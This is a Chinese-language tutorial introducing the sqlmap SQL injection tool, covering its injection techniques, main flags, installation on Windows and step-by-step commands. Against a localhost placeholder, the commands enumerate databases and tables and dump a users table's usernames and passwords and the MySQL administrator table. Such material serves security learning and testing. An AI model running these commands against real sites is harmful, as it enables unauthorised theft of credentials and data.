一、sqlmap介绍
简介:是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的
url的sql注入漏洞,内置了很多插件
sqlmap支持的数据库: MySQL、oracle、sql-server、DB2....
注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞
sqlmap使用的sql注入方式:
1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入
2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行
3、基于报错注入:根据页面返回的错误信息
4、联合查询注入:根据使用的union的情况下注入
sqlmap的简单使用:
-u url: 检测的注入点
--dbs: 列出所有数据库的名称
--current-db: 列出当前的数据库名称
-D: 指定的一个数据库
--tables: 列出数据库表名称
-T: 指定的一个表名称
--columns: 列出所有的字段名
-C: 指定字段
--dump: 列出字段的内容
--users: 获取数据所有的用户信息
安装sqlmap:
1、安装Python2.7 ,新建一个目录:python2.7
2、双击Python安装包,安装到python2.7目录
3、将python2.7添加环境变量
4、解压sqlmap1.5压缩包到D盘:d:/sqlmap
5、win+R 输入cmd 进入到D盘
C:\Users\xiaolin>d:
D:\>cd sqlmap
D:\sqlmap>sqlmap.py 回车,如果出现sqlmap图标说明成功
二、使用sqlmap
1、获取数据库的所有数据库名称
sqlmap.py sqlmap -u http://127.0.0.1/xxx --dbs
2、获取当前的数据库名称
sqlmap.py sqlmap -u http://127.0.0.1/xx --current-db
获取到的数据库名称: news
3、获取当前的数据库news所有表名称
sqlmap.py sqlmap -u http://127.0.0.1/xx -D news --tables
4、获取当前的数据库news下news_users表所有字段名称
sqlmap.py sqlmap -u http://127.0.0.1/nxxx -D news -T news_users --columns
5、获取news库下的news_users表的数据
sqlmap.py sqlmap -u http://127.0.0.1/nxxx -D news -T news_users -C username,password --dump
获取MySQL数据库管理员信息:
sqlmap.py sqlmap -u http://127.0.0.1/nxx -D mysql -T user --dump
sqlmap.py sqlmap -u http://127.0.0.1/xx -D information_schema -T tables -C TABLE_NAME,TABLE_SCHEMA --dump
